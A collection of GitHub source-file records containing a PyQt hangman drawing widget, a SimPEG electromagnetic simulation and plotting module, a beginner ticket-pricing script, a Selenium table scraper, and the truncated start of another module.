button.rect.center()\n\n length = button.getLength()\n button.drawButton(painter)\n\n color_icon = QColor(255, 255, 255, int(255 * ((1 - self.overlay) * 2)))\n startAngle = 0 * 16\n spanAngle = -270 * 16\n pen = QPen(color_icon)\n pen.setWidth(int(button.getHeight() / 10))\n pen.setCapStyle(Qt.PenCapStyle.RoundCap)\n painter.setPen(pen)\n\n size_arc = QPointF(length, length) / 7 * 2\n arc_rect = QRect(\n (center - size_arc).toPoint(),\n (center + size_arc).toPoint()\n )\n painter.drawArc(arc_rect, startAngle, spanAngle)\n\n pen = QPen()\n pen.setStyle(Qt.PenStyle.NoPen)\n painter.setPen(pen)\n painter.setBrush(color_icon)\n size_triangle = size_arc\n triangle = QPolygon([\n QPointF(center.x() - size_triangle.x() * 1 / 3, center.y() - size_triangle.y() / 2).toPoint(),\n QPointF(center.x() + size_triangle.x() * 2 / 3, center.y()).toPoint(),\n QPointF(center.x() - size_triangle.x() * 1 / 3, center.y() + size_triangle.y() / 2).toPoint()]\n ).translated(0, - size_arc.toPoint().y())\n painter.drawPolygon(triangle, Qt.FillRule.WindingFill)\n\n def drawBase(self, painter: QPainter, color: QColor, left: int, top: int, width: int, height: int) -> None:\n \"\"\"\n Draw base of hangman\n\n Parameters:\n painter (QPainter): Painter of the paintEvent\n color (QColor): Color of the drawing\n left (int): left corner of the drawing box\n top (int): top corner of the drawing box\n width (int):width of the available space\n height (int): height of the available space\n\n Returns:\n None\n\n \"\"\"\n painter.setBrush(color)\n positionBottomBar = (\n left,\n top + height - self.thickness,\n width,\n self.thickness\n )\n\n painter.drawRect(\n positionBottomBar[0],\n positionBottomBar[1],\n positionBottomBar[2],\n positionBottomBar[3])\n\n def drawPoll(self, painter: QPainter, color: QColor, left: int, top: int, width: int, height: int) -> None:\n \"\"\"\n Draw poll of hangman\n\n Parameters:\n painter (QPainter): Painter of the paintEvent\n color (QColor): Color of the drawing\n left (int): left corner of the drawing box\n top (int): top corner of the drawing box\n width (int):width of the available space\n height (int): height of the available space\n\n Returns:\n None\n\n \"\"\"\n painter.setBrush(color)\n positionPoll = (\n left + int(width * 0.2),\n top + int(height * 0.1),\n self.thickness,\n int(height * 0.9)\n )\n painter.drawRect(\n positionPoll[0],\n positionPoll[1],\n positionPoll[2],\n positionPoll[3])\n\n def drawTop(self, painter: QPainter, color: QColor, left: int, top: int, width: int, height: int) -> None:\n \"\"\"\n Draw top bar of hangman\n\n Parameters:\n painter (QPainter): Painter of the paintEvent\n color (QColor): Color of the drawing\n left (int): left corner of the drawing box\n top (int): top corner of the drawing box\n width (int):width of the available space\n height (int): height of the available space\n\n Returns:\n None\n\n \"\"\"\n painter.setBrush(color)\n positionTopBar = (\n left + int(width * 0.1),\n top + int(height * 0.2),\n int(width * 0.8),\n self.thickness\n )\n painter.drawRect(\n positionTopBar[0],\n positionTopBar[1],\n positionTopBar[2],\n positionTopBar[3])\n\n def drawSupport(self, painter: QPainter, color: QColor, left: int, top: int, width: int, height: int) -> None:\n \"\"\"\n Draw support bar of hangman\n\n Parameters:\n painter (QPainter): Painter of the paintEvent\n color (QColor): Color of the drawing\n left (int): left corner of the drawing box\n top (int): top corner of the drawing box\n width (int):width of the available space\n height (int): height of the available space\n\n Returns:\n None\n\n \"\"\"\n painter.setBrush(color)\n painter.drawPolygon(\n QtGui.QPolygon([\n QPoint(left + int(width * 0.4), top + int(height * 0.2)),\n QPoint(left + int(width * 0.4) + self.thickness, top + int(height * 0.2)),\n QPoint(left + int(width * 0.2), top + int(height * 0.4) + self.thickness),\n QPoint(left + int(width * 0.2), top + int(height * 0.4))\n ]))\n\n def drawHanger(self, painter: QPainter, color: QColor, left: int, top: int, width: int, height: int) -> None:\n \"\"\"\n Draw hanger of hangman\n\n Parameters:\n painter (QPainter): Painter of the paintEvent\n color (QColor): Color of the drawing\n left (int): left corner of the drawing box\n top (int): top corner of the drawing box\n width (int):width of the available space\n height (int): height of the available space\n\n Returns:\n None\n\n \"\"\"\n pen = QPen(color)\n pen.setWidth(self.thickness // 2)\n painter.setPen(pen)\n\n start = QPoint(left + int(width * 0.6) + self.thickness, top + int(height * 0.2))\n end = QPoint(left + int(width * 0.6) + self.thickness, top + int(height * 0.35))\n painter.drawLine(start, end)\n\n def drawHead(self, painter: QPainter, color: QColor, left: int, top: int, width: int, height: int) -> None:\n \"\"\"\n Draw head of hangman\n\n Parameters:\n painter (QPainter): Painter of the paintEvent\n color (QColor): Color of the drawing\n left (int): left corner of the drawing box\n top (int): top corner of the drawing box\n width (int):width of the available space\n height (int): height of the available space\n\n Returns:\n None\n\n \"\"\"\n pen = QPen(color)\n painter.setPen(self.initPen(pen))\n painter.setBrush(color)\n\n radius = int(self.thickness * 1.5)\n center = QPoint(left + int(width * 0.6) + self.thickness, top + int(height * 0.35))\n\n painter.drawEllipse(center, radius, radius)\n\n def drawBody(self, painter: QPainter, color: QColor, left: int, top: int, width: int, height: int) -> None:\n \"\"\"\n Draw body of hangman\n\n Parameters:\n painter (QPainter): Painter of the paintEvent\n color (QColor): Color of the drawing\n left (int): left corner of the drawing box\n top (int): top corner of the drawing box\n width (int):width of the available space\n height (int): height of the available space\n\n Returns:\n None\n\n \"\"\"\n pen = QPen(color)\n painter.setPen(self.initPen(pen))\n\n start = QPoint(left + int(width * 0.6) + self.thickness, top + int(height * 0.35))\n end = QPoint(left + int(width * 0.6) + self.thickness, top + int(height * 0.6))\n painter.drawLine(start, end)\n\n def drawLeftArm(self, painter: QPainter, color: QColor, left: int, top: int, width: int, height: int) -> None:\n \"\"\"\n Draw left arm of hangman\n\n Parameters:\n painter (QPainter): Painter of the paintEvent\n color (QColor): Color of the drawing\n left (int): left corner of the drawing box\n top (int): top corner of the drawing box\n width (int):width of the available space\n height (int): height of the available space\n\n Returns:\n None\n\n \"\"\"\n pen = QPen(color)\n painter.setPen(self.initPen(pen))\n\n start = QPoint(left + int(width * 0.6) + self.thickness, top + int(height * 0.4))\n end = QPoint(left + int(width * 0.5) + self.thickness, top + int(height * 0.5))\n painter.drawLine(start, end)\n\n def drawRightArm(self, painter: QPainter, color: QColor, left: int, top: int, width: int, height: int) -> None:\n \"\"\"\n Draw right arm of hangman\n\n Parameters:\n painter (QPainter): Painter of the paintEvent\n color (QColor): Color of the drawing\n left (int): left corner of the drawing box\n top (int): top corner of the drawing box\n width (int):width of the available space\n height (int): height of the available space\n\n Returns:\n None\n\n \"\"\"\n pen = QPen(color)\n painter.setPen(self.initPen(pen))\n\n start = QPoint(left + int(width * 0.6) + self.thickness, top + int(height * 0.4))\n end = QPoint(left + int(width * 0.7) + self.thickness, top + int(height * 0.5))\n painter.drawLine(start, end)\n\n def drawLeftLeg(self, painter: QPainter, color: QColor, left: int, top: int, width: int, height: int) -> None:\n \"\"\"\n Draw left leg of hangman\n\n Parameters:\n painter (QPainter): Painter of the paintEvent\n color (QColor): Color of the drawing\n left (int): left corner of the drawing box\n top (int): top corner of the drawing box\n width (int):width of the available space\n height (int): height of the available space\n\n Returns:\n None\n\n \"\"\"\n pen = QPen(color)\n painter.setPen(self.initPen(pen))\n\n start = QPoint(left + int(width * 0.6) + self.thickness, top + int(height * 0.6))\n end = QPoint(left + int(width * 0.5) + self.thickness, top + int(height * 0.7))\n painter.drawLine(start, end)\n\n def drawRightLeg(self, painter: QPainter, color: QColor, left: int, top: int, width: int, height: int) -> None:\n \"\"\"\n Draw right leg of hangman\n\n Parameters:\n painter (QPainter): Painter of the paintEvent\n color (QColor): Color of the drawing\n left (int): left corner of the drawing box\n top (int): top corner of the drawing box\n width (int):width of the available space\n height (int): height of the available space\n\n Returns:\n None\n\n \"\"\"\n pen = QPen(color)\n painter.setPen(self.initPen(pen))\n\n start = QPoint(left + int(width * 0.6) + self.thickness, top + int(height * 0.6))\n end = QPoint(left + int(width * 0.7) + self.thickness, top + int(height * 0.7))\n painter.drawLine(start, end)\n\n def initPen(self, pen: QPen) -> QPen:\n \"\"\"\n Show character at an index\n\n Parameters:\n index (int): Index of character in a word that you want to show\n\n Returns:\n None\n\n \"\"\"\n pen.setWidth(self.thickness // 2)\n pen.setCapStyle(Qt.PenCapStyle.RoundCap)\n return pen\n\n\nif __name__ == \"__main__\":\n app = QtWidgets.QApplication(sys.argv)\n widget = TestWindow()\n app.exec()\n","repo_name":"cis3296f22/prj-04-hangmanai","sub_path":"Display/HangmanView.py","file_name":"HangmanView.py","file_ext":"py","file_size_in_byte":27271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"10020771532","text":"import numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport deepdish as dd\nfrom discretize import TensorMesh\nfrom SimPEG import utils\nimport tarfile\nimport os\n\nfrom mpl_toolkits.mplot3d import axes3d\nfrom matplotlib import cm\nfrom mpl_toolkits.mplot3d.art3d import Poly3DCollection\nfrom matplotlib.patches import FancyArrowPatch\nfrom mpl_toolkits.mplot3d import proj3d\n\n\ndef download_and_unzip_data(\n url=\"https://storage.googleapis.com/simpeg/em_examples/tdem_groundedsource/tdem_groundedsource.tar\",\n):\n \"\"\"\n Download the data from the storage bucket, unzip the tar file, return\n the directory where the data are\n \"\"\"\n # download the data\n downloads = utils.download(url)\n\n # directory where the downloaded files are\n directory = downloads.split(\".\")[0]\n\n # unzip the tarfile\n tar = tarfile.open(downloads, \"r\")\n tar.extractall()\n tar.close()\n\n return downloads, directory\n\n\nuse_computed_results = True\n\n\ndef load_or_run_results(\n re_run=False, fname=None, sigma_block=0.01, sigma_halfspace=0.01\n):\n if re_run:\n run_simulation(\n fname=fname, sigma_block=sigma_block, sigma_halfspace=sigma_halfspace\n )\n else:\n downloads, directory = download_and_unzip_data()\n fname = os.path.sep.join([directory, fname])\n\n simulation_results = dd.io.load(fname)\n mesh = TensorMesh(\n simulation_results[\"mesh\"][\"h\"], x0=simulation_results[\"mesh\"][\"x0\"]\n )\n sigma = simulation_results[\"sigma\"]\n times = simulation_results[\"time\"]\n input_currents = simulation_results[\"input_currents\"]\n E = simulation_results[\"E\"]\n B = simulation_results[\"B\"]\n J = simulation_results[\"J\"]\n output = {\n \"mesh\": mesh,\n \"sigma\": sigma,\n \"times\": times,\n \"input_currents\": input_currents,\n \"E\": E,\n \"B\": B,\n \"J\": J,\n }\n return output\n\n\ndef choose_model(model):\n known_names = [\"tdem_gs_half.h5\", \"tdem_gs_conductor.h5\", \"tdem_gs_resistor.h5\"]\n if model == \"halfspace\":\n ind = 0\n elif model == \"conductor\":\n ind = 1\n elif model == \"resistor\":\n ind = 2\n return known_names[ind]\n\n\ndef run_simulation(fname=\"tdem_gs_half.h5\", sigma_block=0.01, sigma_halfspace=0.01):\n from SimPEG.electromagnetics import time_domain as tdem\n from SimPEG.electromagnetics.utils import waveform_utils\n from scipy.constants import mu_0\n import numpy as np\n from SimPEG import maps, utils\n from pymatsolver import Pardiso\n\n cs = 20\n ncx, ncy, ncz = 20, 20, 20\n npad = 10\n hx = [(cs, npad, -1.5), (cs, ncx), (cs, npad, 1.5)]\n hy = [(cs, npad, -1.5), (cs, ncy), (cs, npad, 1.5)]\n hz = [(cs, npad, -1.5), (cs, ncz), (cs, npad, 1.5)]\n mesh = TensorMesh([hx, hy, hz], \"CCC\")\n sigma = np.ones(mesh.nC) * sigma_halfspace\n blk_ind = utils.ModelBuilder.getIndicesBlock(\n np.r_[-40, -40, -160], np.r_[40, 40, -80], mesh.gridCC\n )\n sigma[mesh.gridCC[:, 2] > 0.0] = 1e-8\n sigma[blk_ind] = sigma_block\n\n xmin, xmax = -200.0, 200.0\n ymin, ymax = -200.0, 200.0\n x = mesh.cell_centers_x[np.logical_and(mesh.cell_centers_x > xmin, mesh.cell_centers_x < xmax)]\n y = mesh.cell_centers_y[np.logical_and(mesh.cell_centers_y > ymin, mesh.cell_centers_y < ymax)]\n xyz = utils.ndgrid(x, y, np.r_[-1.0])\n\n px = np.r_[-200.0, 200.0]\n py = np.r_[0.0, 0.0]\n pz = np.r_[0.0, 0.0]\n srcLoc = np.c_[px, py, pz]\n\n from scipy.interpolate import interp1d\n\n t0 = 0.01 + 1e-4\n times = np.logspace(-4, -2, 21)\n rx_ex = tdem.receivers.PointElectricField(xyz, times + t0, orientation=\"x\")\n rx_ey = tdem.receivers.PointElectricField(xyz, times + t0, orientation=\"y\")\n rx_by = tdem.receivers.PointElectricField(xyz, times + t0, orientation=\"y\")\n\n rxList = [rx_ex, rx_ey, rx_by]\n\n sim = tdem.Simulation3DMagneticFluxDensity(mesh, sigma=sigma, verbose=True)\n sim.Solver = Pardiso\n sim.solverOpts = {\"is_symmetric\": False}\n sim.time_steps = [(1e-3, 10), (2e-5, 10), (1e-4, 10), (5e-4, 10), (1e-3, 10)]\n t0 = 0.01 + 1e-4\n out = waveform_utils.VTEMFun(sim.times, 0.01, t0, 200)\n wavefun = interp1d(sim.times, out)\n waveform = tdem.sources.RawWaveform(offTime=t0, waveFct=wavefun)\n\n src = tdem.sources.LineCurrent(rxList, location=srcLoc, waveform=waveform)\n survey = tdem.survey.Survey([src])\n sim.survey = survey\n input_currents = wavefun(sim.times)\n\n f = sim.fields(sigma)\n\n xyzlim = np.array([[xmin, xmax], [ymin, ymax], [-400, 0.0]])\n actinds, meshCore = utils.extract_core_mesh(xyzlim, mesh)\n Pex = mesh.getInterpolationMat(meshCore.gridCC, locType=\"Ex\")\n Pey = mesh.getInterpolationMat(meshCore.gridCC, locType=\"Ey\")\n Pez = mesh.getInterpolationMat(meshCore.gridCC, locType=\"Ez\")\n Pfx = mesh.getInterpolationMat(meshCore.gridCC, locType=\"Fx\")\n Pfy = mesh.getInterpolationMat(meshCore.gridCC, locType=\"Fy\")\n Pfz = mesh.getInterpolationMat(meshCore.gridCC, locType=\"Fz\")\n\n sigma_core = sigma[actinds]\n\n def getEBJcore(src0):\n B0 = np.r_[Pfx * f[src0, \"b\"], Pfy * f[src0, \"b\"], Pfz * f[src0, \"b\"]]\n E0 = np.r_[Pex * f[src0, \"e\"], Pey * f[src0, \"e\"], Pez * f[src0, \"e\"]]\n J0 = utils.sdiag(np.r_[sigma_core, sigma_core, sigma_core]) * E0\n return E0, B0, J0\n\n E, B, J = getEBJcore(src)\n tdem_gs = {\n \"E\": E,\n \"B\": B,\n \"J\": J,\n \"sigma\": sigma_core,\n \"mesh\": meshCore.serialize(),\n \"time\": sim.times - t0,\n \"input_currents\": input_currents,\n }\n dd.io.save(fname, tdem_gs)\n\n\n# ------------------------------------------------------------------- #\n# For visualizations\n# ------------------------------------------------------------------- #\n\n\nclass PlotTDEM(object):\n \"\"\"docstring for PlotTDEM\"\"\"\n\n mesh = None\n sigma = None\n times = None\n input_currents = None\n E = None\n B = None\n J = None\n\n def __init__(self, **kwargs):\n super(PlotTDEM, self).__init__()\n utils.setKwargs(self, **kwargs)\n self.xmin, self.xmax = self.mesh.cell_centers_x.min(), self.mesh.cell_centers_x.max()\n self.ymin, self.ymax = self.mesh.cell_centers_y.min(), self.mesh.cell_centers_y.max()\n self.zmin, self.zmax = self.mesh.cell_centers_z.min(), self.mesh.cell_centers_z.max()\n\n def show_3d_survey_geometry(self, elev, azim, show_block=False):\n X1, X2 = -250.0, 250.0\n Y1, Y2 = -250.0, 250.0\n Z1, Z2 = -400.0, 0.0\n\n def polyplane(verts, alpha=0.1, color=\"green\"):\n poly = Poly3DCollection(verts)\n poly.set_alpha(alpha)\n poly.set_facecolor(color)\n return poly\n\n z1 = -100.0\n x = np.r_[X1, X2, X2, X1, X1]\n y = np.ones(5) * 0.0\n z = np.r_[Z1, Z1, Z2, Z2, Z1]\n verts = [list(zip(x, y, z))]\n polyplane(verts, color=\"green\")\n x = np.r_[X1, X2, X2, X1, X1]\n y = np.r_[Y1, Y1, Y2, Y2, Y1]\n z = np.ones(5) * 0.0\n verts = [list(zip(x, y, z))]\n polyplane(verts, color=\"grey\")\n x = np.r_[X1, X2, X2, X1, X1]\n y = np.r_[Y1, Y1, Y2, Y2, Y1]\n z = np.ones(5) * z1\n verts = [list(zip(x, y, z))]\n polyplane(verts, color=\"grey\")\n\n fig = plt.figure(figsize=(8, 8))\n ax = fig.add_subplot(projection='3d')\n ax.plot3D(np.r_[-200, 200], np.r_[0, 0], np.r_[1, 1] * 0.0, \"r-\", lw=3)\n ax.plot3D(\n self.mesh.gridCC[:, 0],\n self.mesh.gridCC[:, 1],\n np.zeros_like(self.mesh.gridCC[:, 0]),\n \"k.\",\n )\n ax.legend((\"Tx\", \"Rx\"), loc=1)\n\n if show_block:\n\n xc, yc, zc = 0, 0, 0\n x1, x2 = -40, 40\n y1, y2 = -40, 40\n z1, z2 = -160, -80\n x = np.r_[x1, x2, x2, x1, x1]\n y = np.ones(5) * 0.0\n z = np.r_[z1, z1, z2, z2, z1]\n ax.plot3D(x, y, z, \"k--\")\n x = np.r_[x1, x2, x2, x1, x1]\n y = np.r_[y1, y1, y2, y2, y1]\n z = np.ones(5) * (z1 + z2) / 2.0\n ax.plot3D(x, y, z, \"k--\")\n\n block_xyz = np.asarray(\n [\n [x1, x1, x2, x2, x1, x1, x2, x2],\n [y1, y2, y2, y1, y1, y2, y2, y1],\n [z1, z1, z1, z1, z2, z2, z2, z2],\n ]\n )\n xyz = block_xyz.T\n # Face 1\n ax.add_collection3d(\n Poly3DCollection(\n [list(zip(xyz[:4, 0] + xc, xyz[:4, 1] + yc, xyz[:4, 2] + zc))],\n facecolors=\"k\",\n alpha=0.5,\n )\n )\n\n # Face 2\n ax.add_collection3d(\n Poly3DCollection(\n [list(zip(xyz[4:, 0] + xc, xyz[4:, 1] + yc, xyz[4:, 2] + zc))],\n facecolors=\"k\",\n alpha=0.5,\n )\n )\n\n # Face 3\n ax.add_collection3d(\n Poly3DCollection(\n [\n list(\n zip(\n xyz[[0, 1, 5, 4], 0] + xc,\n xyz[[0, 1, 5, 4], 1] + yc,\n xyz[[0, 1, 5, 4], 2] + zc,\n )\n )\n ],\n facecolors=\"k\",\n alpha=0.5,\n )\n )\n\n # Face 4\n ax.add_collection3d(\n Poly3DCollection(\n [\n list(\n zip(\n xyz[[3, 2, 6, 7], 0] + xc,\n xyz[[3, 2, 6, 7], 1] + yc,\n xyz[[3, 2, 6, 7], 2] + zc,\n )\n )\n ],\n facecolors=\"k\",\n alpha=0.5,\n )\n )\n\n # Face 5\n ax.add_collection3d(\n Poly3DCollection(\n [\n list(\n zip(\n xyz[[0, 4, 7, 3], 0] + xc,\n xyz[[0, 4, 7, 3], 1] + yc,\n xyz[[0, 4, 7, 3], 2] + zc,\n )\n )\n ],\n facecolors=\"k\",\n alpha=0.5,\n )\n )\n\n # Face 6\n ax.add_collection3d(\n Poly3DCollection(\n [\n list(\n zip(\n xyz[[1, 5, 6, 2], 0] + xc,\n xyz[[1, 5, 6, 2], 1] + yc,\n xyz[[1, 5, 6, 2], 2] + zc,\n )\n )\n ],\n facecolors=\"k\",\n alpha=0.5,\n )\n )\n\n ax.set_xlim(X1, X2)\n ax.set_ylim(Y1, Y2)\n ax.set_zlim(Z1, Z2)\n ax.set_xlabel(\"X (m)\")\n ax.set_ylabel(\"Y (m)\")\n ax.set_zlabel(\"Depth (m)\")\n # ax.set_aspect(\"equal\")\n ax.view_init(elev=elev, azim=azim)\n plt.show()\n\n def plot_input_currents(self, itime, scale):\n plt.figure()\n\n plt.plot(self.times * 1e3, self.input_currents, \"k|-\")\n plt.plot(self.times[itime] * 1e3, self.input_currents[itime], \"ro\")\n plt.xlabel(\"Time (ms)\")\n plt.ylabel(\"Normalized current\")\n plt.xscale(scale)\n plt.show()\n\n def getSlices(self, mesh, vec, itime, normal=\"Z\", loc=0.0, isz=False):\n VEC = vec[:, itime].reshape((mesh.nC, 3), order=\"F\")\n if normal == \"Z\":\n ind = np.argmin(abs(mesh.cell_centers_z - loc))\n vx = VEC[:, 0].reshape((mesh.mesh.shape_cells[0], mesh.mesh.shape_cells[1], mesh.mesh.shape_cells[2]), order=\"F\")[:, :, ind]\n vy = VEC[:, 1].reshape((mesh.mesh.shape_cells[0], mesh.mesh.shape_cells[1], mesh.mesh.shape_cells[2]), order=\"F\")[:, :, ind]\n vz = VEC[:, 2].reshape((mesh.mesh.shape_cells[0], mesh.mesh.shape_cells[1], mesh.mesh.shape_cells[2]), order=\"F\")[:, :, ind]\n xy = utils.ndgrid(mesh.cell_centers_x, mesh.cell_centers_y)\n if isz:\n return utils.mkvc(vz), xy\n else:\n return np.c_[utils.mkvc(vx), utils.mkvc(vy)], xy\n\n elif normal == \"Y\":\n ind = np.argmin(abs(mesh.cell_centers_x - loc))\n vx = VEC[:, 0].reshape((mesh.mesh.shape_cells[0], mesh.mesh.shape_cells[1], mesh.mesh.shape_cells[2]), order=\"F\")[:, ind, :]\n vy = VEC[:, 1].reshape((mesh.mesh.shape_cells[0], mesh.mesh.shape_cells[1], mesh.mesh.shape_cells[2]), order=\"F\")[:, ind, :]\n vz = VEC[:, 2].reshape((mesh.mesh.shape_cells[0], mesh.mesh.shape_cells[1], mesh.mesh.shape_cells[2]), order=\"F\")[:, ind, :]\n xz = utils.ndgrid(mesh.cell_centers_x, mesh.cell_centers_z)\n if isz:\n return utils.mkvc(vz), xy\n else:\n return np.c_[utils.mkvc(vx), utils.mkvc(vz)], xz\n\n elif normal == \"X\":\n ind = np.argmin(abs(mesh.cell_centers_y - loc))\n vx = VEC[:, 0].reshape((mesh.mesh.shape_cells[0], mesh.mesh.shape_cells[1], mesh.mesh.shape_cells[2]), order=\"F\")[ind, :, :]\n vy = VEC[:, 1].reshape((mesh.mesh.shape_cells[0], mesh.mesh.shape_cells[1], mesh.mesh.shape_cells[2]), order=\"F\")[ind, :, :]\n vz = VEC[:, 2].reshape((mesh.mesh.shape_cells[0], mesh.mesh.shape_cells[1], mesh.mesh.shape_cells[2]), order=\"F\")[ind, :, :]\n yz = utils.ndgrid(mesh.cell_centers_y, mesh.cell_centers_z)\n if isz:\n return utils.mkvc(vz), xy\n else:\n return np.c_[utils.mkvc(vy), utils.mkvc(vz)], yz\n\n def plot_electric_currents(self, itime):\n exy, xy = self.getSlices(self.mesh, self.J, itime, normal=\"Z\", loc=-100.5)\n exz, xz = self.getSlices(self.mesh, self.J, itime, normal=\"Y\", loc=0.0)\n label = \"Current density (A/m$^2$)\"\n plt.figure(figsize=(12, 5))\n ax1 = plt.subplot(121)\n ax2 = plt.subplot(122)\n vmin, vmax = abs(np.r_[exz]).min(), abs(np.r_[exz]).max()\n out_xz = utils.plot2Ddata(\n xz, exz, vec=True, ncontour=20, contourOpts={\"cmap\": \"viridis\"}, ax=ax2\n )\n vmin, vmax = out_xz[0].get_clim()\n utils.plot2Ddata(\n xy,\n exy,\n vec=True,\n ncontour=20,\n contourOpts={\"cmap\": \"viridis\", \"vmin\": vmin, \"vmax\": vmax},\n ax=ax1,\n )\n ax1.set_aspect(\"equal\", adjustable=\"box\")\n ax2.set_aspect(\"equal\", adjustable=\"box\")\n plt.colorbar(\n out_xz[0],\n ax=ax1,\n format=\"%.1e\",\n ticks=np.linspace(vmin, vmax, 5),\n fraction=0.02,\n )\n cb = plt.colorbar(\n out_xz[0],\n ax=ax2,\n format=\"%.1e\",\n ticks=np.linspace(vmin, vmax, 5),\n fraction=0.02,\n )\n cb.set_label(label)\n ax1.set_title(\"\")\n ax1.set_xlabel(\"X (m)\")\n ax1.set_ylabel(\"Y (m)\")\n ax2.set_xlabel(\"X (m)\")\n ax2.set_ylabel(\"Z (m)\")\n ax1.set_xlim(self.xmin, self.xmax)\n ax1.set_ylim(self.ymin, self.ymax)\n ax2.set_xlim(self.xmin, self.xmax)\n ax2.set_ylim(self.zmin, self.zmax)\n\n ax1.plot(ax1.get_xlim(), np.zeros(2), \"k--\", lw=1)\n ax2.plot(ax1.get_xlim(), np.zeros(2) - 100.0, \"k--\", lw=1)\n title = (\"Time at %.2f ms\") % ((self.times[itime]) * 1e3)\n ax1.set_title(title)\n plt.tight_layout()\n plt.show()\n\n def plot_magnetic_flux(self, itime):\n bxy, xy = self.getSlices(self.mesh, self.B, itime, normal=\"Z\", loc=-100.5)\n byz, yz = self.getSlices(self.mesh, self.B, itime, normal=\"X\", loc=0.0)\n label = \"Magnetic flux density (T)\"\n plt.figure(figsize=(12, 5))\n ax1 = plt.subplot(121)\n ax2 = plt.subplot(122)\n vmin, vmax = abs(np.r_[byz]).min(), abs(np.r_[byz]).max()\n out_yz = utils.plot2Ddata(\n yz, byz, vec=True, ncontour=20, contourOpts={\"cmap\": \"viridis\"}, ax=ax2\n )\n vmin, vmax = out_yz[0].get_clim()\n utils.plot2Ddata(\n xy,\n bxy,\n vec=True,\n ncontour=20,\n contourOpts={\"cmap\": \"viridis\", \"vmin\": vmin, \"vmax\": vmax},\n ax=ax1,\n )\n ax1.set_aspect(\"equal\", adjustable=\"box\")\n ax2.set_aspect(\"equal\", adjustable=\"box\")\n plt.colorbar(\n out_yz[0],\n ax=ax1,\n format=\"%.1e\",\n ticks=np.linspace(vmin, vmax, 5),\n fraction=0.02,\n )\n cb = plt.colorbar(\n out_yz[0],\n ax=ax2,\n format=\"%.1e\",\n ticks=np.linspace(vmin, vmax, 5),\n fraction=0.02,\n )\n cb.set_label(label)\n ax1.set_title(\"\")\n ax1.set_xlabel(\"X (m)\")\n ax1.set_ylabel(\"Y (m)\")\n ax2.set_xlabel(\"Y (m)\")\n ax2.set_ylabel(\"Z (m)\")\n ax1.set_xlim(self.xmin, self.xmax)\n ax1.set_ylim(self.ymin, self.ymax)\n ax2.set_xlim(self.xmin, self.xmax)\n ax2.set_ylim(self.zmin, self.zmax)\n ax1.plot(ax1.get_xlim(), np.zeros(2), \"k--\", lw=1)\n ax2.plot(ax1.get_xlim(), np.zeros(2) - 100.0, \"k--\", lw=1)\n title = (\"Time at %.2f ms\") % ((self.times[itime]) * 1e3)\n ax1.set_title(title)\n plt.tight_layout()\n plt.show()\n","repo_name":"geoscixyz/geosci-labs","sub_path":"geoscilabs/em/TDEMGroundedSource.py","file_name":"TDEMGroundedSource.py","file_ext":"py","file_size_in_byte":17641,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"90"} +{"seq_id":"3339618536","text":"a=input(\"How old are you? \")\r\na=int(a)\r\n\r\n\r\n\r\nif (a>=18):\r\n tic=input(\"How many tickets you want? \")\r\n tic=int(tic)\r\n if tic>=20:\r\n result=(\"Here you go with 2% discount\",(tic*20)/100*98, \"$\")\r\n \r\n \r\n\r\n \r\n \r\n else:\r\n print(\"You have to pay \", tic*20, \"$\")\r\n\r\nif a<=17:\r\n print(\"You are not old enough to buy tickets\")\r\n print(\"Bring a adult with you\")\r\n\r\n \r\n\r\n\r\n\r\n","repo_name":"ali786665s/Python-","sub_path":"arthimetic.py","file_name":"arthimetic.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"72020113898","text":"'''\n获取 http://stock.jrj.com.cn/report/plsj.shtml?to=pc 中的季报预披露时间\n\n'''\nimport csv\nfrom selenium import webdriver # 用来驱动浏览器的\nfrom selenium.webdriver.common.by import By # 按照什么方式查找,By.ID,By.CSS_SELECTOR\n\n\n\ncsvFile=open('预披露时间.csv', mode='w+',newline='',encoding='utf-8')\nwr= csv.writer(csvFile)\n\ndriver = webdriver.Chrome()\ndriver.implicitly_wait(5)\n\ndriver.get(\"http://stock.jrj.com.cn/report/plsj.shtml?to=pc\")\n\ntable_element=driver.find_element(By.XPATH, '//*[@id=\"ntabHeader\"]/table')\nline = table_element.find_element(By.CSS_SELECTOR,'tr')\n\nstr_list=[]\nfor row in line.find_elements(By.CSS_SELECTOR, 'th'):\n str_list.append(row.text)\n\nprint(\"head is :\\n\",str_list)\nwr.writerow(str_list)\n\n\ntable_element=driver.find_element(By.XPATH, '//*[@id=\"ntabBody\"]/table')\nlines = table_element.find_elements(By.CSS_SELECTOR,'tr')\nfor line in lines:\n str_list = []\n for row in line.find_elements(By.CSS_SELECTOR, 'td'):\n str_list.append(row.text)\n\n wr.writerow(str_list)\n\n\n\n#print(str_list)\n\n\n\n\n\n\n'''\n# 先抓取\ndf = pd.read_html(f'http://stock.jrj.com.cn/report/plsj.shtml?to=pc', encoding='gbk', header=0)[1]\nprint(df)\ndf.to_csv('预披露时间.csv', mode='w', index=False) # 追加写入\n\ndf_table=pd.read_html(table_element)[0]\n\ndf_table.to_csv('预披露时间.csv', mode='a+', index=False) # 追加写入\n\n\nimport pandas as pd\ndf = pd.read_html(f'http://stock.jrj.com.cn/report/plsj.shtml?to=pc', encoding='gbk', header=0)[1]\nfor i in range(len(dfs)):\n print(\"{a} is:\".format(a=i),dfs[i])\n \n参见 https://stackoverflow.com/questions/58775641/pandas-read-html-not-wait-for-page-loading \n中说 read_html只能抓取html静态页面中的table, 如果是JS程序产生的table,只能使用selenium\n \n'''\n\n\n\n\n","repo_name":"todaygood/note-python","sub_path":"practise/YuPiLuTime_to_csv.py","file_name":"YuPiLuTime_to_csv.py","file_ext":"py","file_size_in_byte":1809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"39922080005","text":"import time\nfrom utils import ora\nfrom utils.progress_bar import update_progress\nimport sql_scripts\nfrom eq_db.classes.demands import DpgDemand, DpgDemandSystem, DpgDemandLoad, DpgDemandFSK\nfrom eq_db.classes.supplies import DpgSupply\nfrom eq_db.classes.dpg_list import DpgList\nfrom eq_db.classes.dpg import DpgImpex\nfrom eq_db.classes.nodes import make_nodes\nfrom eq_db.classes.lines import make_lines\nfrom eq_db.classes.sections import make_sections\n# import random\nimport mat4py\n\n\ndef make_dpgs(tsid, tdate='', nodes=None, lines=None, sections=None):\n# tsid = 221348901\n# tdate = 